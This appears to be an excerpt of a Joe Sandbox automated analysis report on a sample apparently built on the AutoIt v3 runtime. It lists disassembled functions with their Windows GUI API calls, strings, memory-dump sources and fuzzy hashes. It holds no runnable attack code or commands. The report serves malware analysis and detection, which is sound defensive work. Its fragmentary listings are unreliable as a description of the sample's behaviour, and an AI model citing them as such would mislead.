Instruction Fuzzy Hash: 588110B0600205BBCB21BA60EC83FEA77ACAF56710F044424F945AE2D2EB61DE45D7A1

Function 00A09A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00A09AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00A09B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00A09BA7

Strings

0, xrefs: 00A09BE4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 5b418e6c913e9618313c2e6c3f83c94ebab9959f6ea5dfadff00c2e881d00f60
Instruction ID: f147905ed7b36ce2e787e53efd5cb2e2918786fc702c262620dad407950b1654
Opcode Fuzzy Hash: 5b418e6c913e9618313c2e6c3f83c94ebab9959f6ea5dfadff00c2e881d00f60
Instruction Fuzzy Hash: AF02BB70104309AFE725CF24D848BABBBE5FF89314F04852DF999962E2C735D946CB52

Function 00A0A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00A0A903
SetTextColor.GDI32(?,?), ref: 00A0A907
GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
GetSysColor.USER32(0000000F), ref: 00A0A928
CreateSolidBrush.GDI32(?), ref: 00A0A92D
GetSysColor.USER32(00000011), ref: 00A0A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
SelectObject.GDI32(?,00000000), ref: 00A0A964
SetBkColor.GDI32(?,00000000), ref: 00A0A96D
SelectObject.GDI32(?,?), ref: 00A0A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A0AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00A0AA32
DrawFocusRect.USER32(?,?), ref: 00A0AA3D
GetSysColor.USER32(00000011), ref: 00A0AA4B
SetTextColor.GDI32(?,00000000), ref: 00A0AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A0AA67
SelectObject.GDI32(?,00A0A5FA), ref: 00A0AA7E
DeleteObject.GDI32(?), ref: 00A0AA89
SelectObject.GDI32(?,?), ref: 00A0AA8F
DeleteObject.GDI32(?), ref: 00A0AA94
SetTextColor.GDI32(?,?), ref: 00A0AA9A
SetBkColor.GDI32(?,?), ref: 00A0AAA4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 932c459c315b00fab413b28bc334f0267c1c0b8b2827b1c16392e1365a436203
Instruction ID: 28e09dc123cff3d3c0610a42eeebdc8cf5fbdaba9581a2fb56e9c4447b05d17f
Opcode Fuzzy Hash: 932c459c315b00fab413b28bc334f0267c1c0b8b2827b1c16392e1365a436203
Instruction Fuzzy Hash: 95512B7190020CEFDB21DFA4DC48EAE7BB9EB48320F114625FA11BB2A1D7719942DF90

Function 00A089D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A08AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08AD2
CharNextW.USER32(0000014E), ref: 00A08B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A08B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A08B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A08B86
SetWindowTextW.USER32(?,0000014E), ref: 00A08BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A08BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A08C1F
_memset.LIBCMT ref: 00A08C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A08C8D
_memset.LIBCMT ref: 00A08CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A08D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A08D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00A08E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00A08E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08EB4
DrawMenuBar.USER32(?), ref: 00A08EC3
SetWindowTextW.USER32(?,0000014E), ref: 00A08EEB

Strings

0, xrefs: 00A08E55

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 15879207b34fcca7e9a5fd1cd17159f4a5d6e2309f80bd4338ab0f8770b41430
Instruction ID: 4fc3944f9952503e851056c6e89c84be5e1da8c6842a56644da1b6ab45f07b94
Opcode Fuzzy Hash: 15879207b34fcca7e9a5fd1cd17159f4a5d6e2309f80bd4338ab0f8770b41430
Instruction Fuzzy Hash: 74E17D7090020DAFDF20DFA0DC84AEE7BB9EF49750F108156F955AA2D1DB788981DF64

Function 00A0488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A049CA
GetDesktopWindow.USER32 ref: 00A049DF
GetWindowRect.USER32(00000000), ref: 00A049E6
GetWindowLongW.USER32(?,000000F0), ref: 00A04A48
DestroyWindow.USER32(?), ref: 00A04A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A04A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A04ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A04AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00A04AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A04B09
IsWindowVisible.USER32(?), ref: 00A04B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A04B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A04B58
GetWindowRect.USER32(?,?), ref: 00A04B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00A04B96
GetMonitorInfoW.USER32(00000000,?), ref: 00A04BB0
CopyRect.USER32(?,?), ref: 00A04BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00A04C32

Strings

tooltips_class32, xrefs: 00A04A96
0, xrefs: 00A04975
(, xrefs: 00A04BA3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
Instruction ID: f0a12d9f49aec77818216c92de7993e0bd84e754ecec697b2afb293676bdd17c
Opcode Fuzzy Hash: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
Instruction Fuzzy Hash: 3AB18CB1604344AFDB04DF64D844B6ABBE4BF88350F048A1DF699AB2A1D771EC06CB55

Function 009E449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 009E44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009E44D2
_wcscpy.LIBCMT ref: 009E4500
_wcscmp.LIBCMT ref: 009E450B
_wcscat.LIBCMT ref: 009E4521
_wcsstr.LIBCMT ref: 009E452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009E4548
_wcscat.LIBCMT ref: 009E4591
_wcscat.LIBCMT ref: 009E4598
_wcsncpy.LIBCMT ref: 009E45C3

Strings

DefaultLangCodepage, xrefs: 009E45AB
%u.%u.%u.%u, xrefs: 009E4626
04090000, xrefs: 009E457E
\VarFileInfo\Translation, xrefs: 009E4540
StringFileInfo\, xrefs: 009E451B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: d6e84ae04613aa80717dc52cd9f841dd5fd765e7cfff6aeff732e592af4f4d09
Instruction ID: ef3e446d3a24886ab8d55e2e539a372eebb1f1aaed8e65d9ccb56e71b1bcf7e9
Opcode Fuzzy Hash: d6e84ae04613aa80717dc52cd9f841dd5fd765e7cfff6aeff732e592af4f4d09
Instruction Fuzzy Hash: AA41C232A00204BBDB11AB759C47FBF77ACEF86710F14086AF905A61C2EB749A0196E5

Function 009827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828BC
GetSystemMetrics.USER32(00000007), ref: 009828C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828EF
GetSystemMetrics.USER32(00000008), ref: 009828F7
GetSystemMetrics.USER32(00000004), ref: 0098291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00982939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00982949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0098297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00982990
GetClientRect.USER32(00000000,000000FF), ref: 009829AE
GetStockObject.GDI32(00000011), ref: 009829CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 009829D5

Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
Part of subcall function 00982344: ScreenToClient.USER32(00A457B0,?), ref: 00982374
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7

SetTimer.USER32(00000000,00000000,00000028,00981256), ref: 009829FC

Strings

AutoIt v3 GUI, xrefs: 00982974

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 7cc9e4ad296f0043364df012d14de0d166b4e142d5172eed8d9537824cd7358b
Instruction ID: 5ff8a6e7c5171a730add144e3c452bab28255f48a0a954d9cdd173bb84f7671a
Opcode Fuzzy Hash: 7cc9e4ad296f0043364df012d14de0d166b4e142d5172eed8d9537824cd7358b
Instruction Fuzzy Hash: E8B15D75A0020AEFDF24EFA8DD45BAE7BB4FB48711F104129FA15A72D0DB75A842CB50

Function 009DA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009DA47A
__swprintf.LIBCMT ref: 009DA51B
_wcscmp.LIBCMT ref: 009DA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009DA583
_wcscmp.LIBCMT ref: 009DA5BF
GetClassNameW.USER32(?,?,00000400), ref: 009DA5F6
GetDlgCtrlID.USER32(?), ref: 009DA648
GetWindowRect.USER32(?,?), ref: 009DA67E
GetParent.USER32(?), ref: 009DA69C
ScreenToClient.USER32(00000000), ref: 009DA6A3
GetClassNameW.USER32(?,?,00000100), ref: 009DA71D
_wcscmp.LIBCMT ref: 009DA731
GetWindowTextW.USER32(?,?,00000400), ref: 009DA757
_wcscmp.LIBCMT ref: 009DA76B

Part of subcall function 009A362C: _iswctype.LIBCMT ref: 009A3634

Strings

%s%u, xrefs: 009DA515

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
Instruction ID: 43848a03d14fa1671c11777024f4c75b099ebfee76330e6b3a53b66fcf70742b
Opcode Fuzzy Hash: d302d533e41201f9bc83bcab0855f403ea6cfcaa25cb6ce560b8a93e56f97aa8
Instruction Fuzzy Hash: 70A1B071644206EFDB15DF64C884BAAB7ECFF44354F00C52AF999D2290DB30E966CB92

Function 009DAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 009DAF18
_wcscmp.LIBCMT ref: 009DAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 009DAF51
CharUpperBuffW.USER32(?,00000000), ref: 009DAF6E
_wcscmp.LIBCMT ref: 009DAF8C
_wcsstr.LIBCMT ref: 009DAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 009DAFD5
_wcscmp.LIBCMT ref: 009DAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 009DB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 009DB055
_wcscmp.LIBCMT ref: 009DB065
GetClassNameW.USER32(00000010,?,00000400), ref: 009DB08D
GetWindowRect.USER32(00000004,?), ref: 009DB0F6

Strings

@, xrefs: 009DAEF9
ThumbnailClass, xrefs: 009DAFE0, 009DB060

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
Instruction ID: 263baec6cd951e305a79320c61731d907dfe7deca458c1171f08195b002743f0
Opcode Fuzzy Hash: de095f6d08ac5de75e947699193564310757cc52ff65477ba97c1859a228ee6b
Instruction Fuzzy Hash: 8781BF71148209DFDB15DF14C881BAAB7ECEF84314F04C46AFD859A295DB34DD4ACBA2

Function 009DABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009DAC33

Strings

[REGEXPTITLE:, xrefs: 009DAC5B
HANDLE=, xrefs: 009DAC2C
CLASSNAME=, xrefs: 009DAC70
[ALL, xrefs: 009DACD9
LAST, xrefs: 009DABF8
[CLASS:, xrefs: 009DAC83
ALL, xrefs: 009DACC7
ACTIVE, xrefs: 009DAC0E
REGEXP=, xrefs: 009DAC48
[LAST, xrefs: 009DACE0
[ACTIVE, xrefs: 009DAC20
[HANDLE:, xrefs: 009DAC3F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 8a3225491309d51f06038de458832c365c8c49b78bede0c756979bf603fe38cc
Instruction ID: 1885951f32a8e7fc7e687fd394afb737548db9adcb6e6508b6ce938f61da97f7
Opcode Fuzzy Hash: 8a3225491309d51f06038de458832c365c8c49b78bede0c756979bf603fe38cc
Instruction Fuzzy Hash: C1319671988209BBDB24FB60DD03FAEB764AF50760F604816F441712D1EF51AF14D692

Function 009F4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 009F5013
LoadCursorW.USER32(00000000,00007F00), ref: 009F501E
LoadCursorW.USER32(00000000,00007F03), ref: 009F5029
LoadCursorW.USER32(00000000,00007F8B), ref: 009F5034
LoadCursorW.USER32(00000000,00007F01), ref: 009F503F
LoadCursorW.USER32(00000000,00007F81), ref: 009F504A
LoadCursorW.USER32(00000000,00007F88), ref: 009F5055
LoadCursorW.USER32(00000000,00007F80), ref: 009F5060
LoadCursorW.USER32(00000000,00007F86), ref: 009F506B
LoadCursorW.USER32(00000000,00007F83), ref: 009F5076
LoadCursorW.USER32(00000000,00007F85), ref: 009F5081
LoadCursorW.USER32(00000000,00007F82), ref: 009F508C
LoadCursorW.USER32(00000000,00007F84), ref: 009F5097
LoadCursorW.USER32(00000000,00007F04), ref: 009F50A2
LoadCursorW.USER32(00000000,00007F02), ref: 009F50AD
LoadCursorW.USER32(00000000,00007F89), ref: 009F50B8
GetCursorInfo.USER32(?), ref: 009F50C8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
Instruction ID: 85fbc7cde905e5bc127d94497eb431c1769eccd500a473c549fb6dced660a956
Opcode Fuzzy Hash: f7e5b41d087ce64a685f19ae03a118da8dd349d38752b8bff207c2176ef4d019
Instruction Fuzzy Hash: F931F6B1D4831D6ADF109FB68C8996EBFECFF04750F54452AE60DE7280DA78A5018F91

Function 00A0A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0A259
DestroyWindow.USER32(?,?), ref: 00A0A2D3

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A0A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A0A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A382
DestroyWindow.USER32(00000000), ref: 00A0A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A0A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A0A3F4
GetDesktopWindow.USER32 ref: 00A0A40D
GetWindowRect.USER32(00000000), ref: 00A0A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A0A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A0A444

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

Strings

0, xrefs: 00A0A26F
tooltips_class32, xrefs: 00A0A346, 00A0A3D4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
Instruction ID: 446e7d37091aa9f40b8c69208b820c9862345a243a890d923d6a333674a6efee
Opcode Fuzzy Hash: 341874a02af07426c1d779bf61bf11c5562bf13463336413fba0c80e21e16e23
Instruction Fuzzy Hash: B6719B78540348AFD721CF68DC48F6A7BE5FB99300F04452CF9869B2A1CB72E902CB52

Function 00A0C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DragQueryPoint.SHELL32(?,?), ref: 00A0C627

Part of subcall function 00A0AB37: ClientToScreen.USER32(?,?), ref: 00A0AB60
Part of subcall function 00A0AB37: GetWindowRect.USER32(?,?), ref: 00A0ABD6
Part of subcall function 00A0AB37: PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A0C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A0C6BE
_wcscat.LIBCMT ref: 00A0C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A0C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00A0C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00A0C757
DragFinish.SHELL32(?), ref: 00A0C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A0C851

Strings

@GUI_DROPID, xrefs: 00A0C77E
@GUI_DRAGFILE, xrefs: 00A0C800
@GUI_DRAGID, xrefs: 00A0C7C9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 838167509628d8d17f27d138f93f6b6c22d29f076160c83b3d45fdad35ac4fc6
Instruction ID: b17cdb2e265037bd5514136012447e065a693099004a86a957b47d959823361d
